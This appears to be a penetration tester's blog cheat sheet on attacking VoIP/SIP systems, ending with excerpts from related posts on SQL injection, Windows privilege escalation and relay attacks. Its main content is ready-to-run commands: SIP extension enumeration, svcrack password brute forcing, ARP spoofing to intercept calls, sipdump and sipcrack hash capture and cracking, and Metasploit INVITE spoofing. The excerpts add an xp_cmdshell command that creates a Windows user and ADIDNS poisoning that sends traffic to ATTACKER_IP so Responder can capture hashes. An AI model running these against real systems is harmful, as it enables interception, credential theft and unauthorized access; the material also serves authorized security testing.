Skip to main content

VOIP - SIP

 

 - SNMP is enabled on many VOIP Devices; check for it

 

VOIP Protocols

- H.323 - Can Initiate, authenticate, end a request.
- Session Initiation Protocol (SIP) - ASCII protocol - reqeuest/response.
-  Real-Time Transport Protocol (RTP) - After connecting via VOIP, RTP is used
- Secure Real time Transport Protocol (SRTP)
#Nmap 
nmap -O -P0 10.10.10.0/23

#Ports
UDP/TCP - 5060 & 5061

#Cisco SCCP Enabled ports
UDP/TCP - 2000-2001

#UDP or TCP - VXWORKS remote debugging
Port 17185
# cisco-audit-tool
CAT -h ip -p 2000 -w /usr/share/wordlists/rockyou.txt 

# cisco-smart-install
https://github.com/Sab0tag3d/SIET/
sudo python siet.py -g -i 192.168.0.1
Enumeration

SIP - 'User Agent' & 'Server'
SIP phone Extensions (usernames)
TFTP Config files
SNMP Config


Using Netcat
nc 10.10.10.10 5060
> OPTIONS sip:test@10.10.10.10 SIP/2.0

SNMP
snmpwalk -c public -v 10.10.10.10 1.3.6.1.4.1.6889
SIPVicious Github
python3 setup.py install #Scan a set of IP's concurrenrly for ip in $(cat $1); do sipvicious_svmap -p5060-5200 $ip & done
sipvicious_svmap 10.10.10.10 -p5060-5200
sipvicious_svmap 10.10.10.10 -p5060-5200 -m INVITE
sipvicious_svwar udp://10.10.10.10:5070 -e100-500
#Enum
sipvicious_svmap 192.168.1.1-254
sipvicious_svmap 192.168.1.1-254 --fp


#Extension Enum
svwar.py -e100-400 192.168.1.104
svwar.py -e100-400 192.168.1.104 -m INVITE -v

#svmap, send SIP OPTIONS
svmap -p5060,5061,5080-5090 10.0.0.1

#svcrack
svcrack -u100 -d dictionary.txt 10.0.0.1
#Capture the SIP Traffic
#arpspoof, sipdump & Sipcrack are inbuilt in kali


echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof –t victim gateway
arpspoof –t gateway victim

Wireshark > not broadcast and not multicast and host <IP ADDRESS>


#Capturing SIP Authentication using SIPDump
sipdump -i eth0
sipdump -i eth0 auth.txt
sipdump -p /root/registration.pcap auth.txt

#cracking response hahses
sipcrack -w sipass.txt auth.txt

#Bruteforcing SIP accounts using svcrack from SIPVIcious
svcrack.py -u200 -d wordlist.txt 192.168.1.104
svcrack.py -u200 -r100000-999999 192.168.1.104
#Enum using Metasploit 

#Scan for SIP Devices
use auxiliary/scanner/sip/options

#Enum SIP extensions/Usernames
use scanner/sip/enumerator
set RHOSTS 10.10.10.10
set MINEXT 100
set MAXEXT 500
set PADLEN 3


#Spoofing
use voip/sip_invite_spoof




might also try Responder

 

Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Relay Attacks

Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/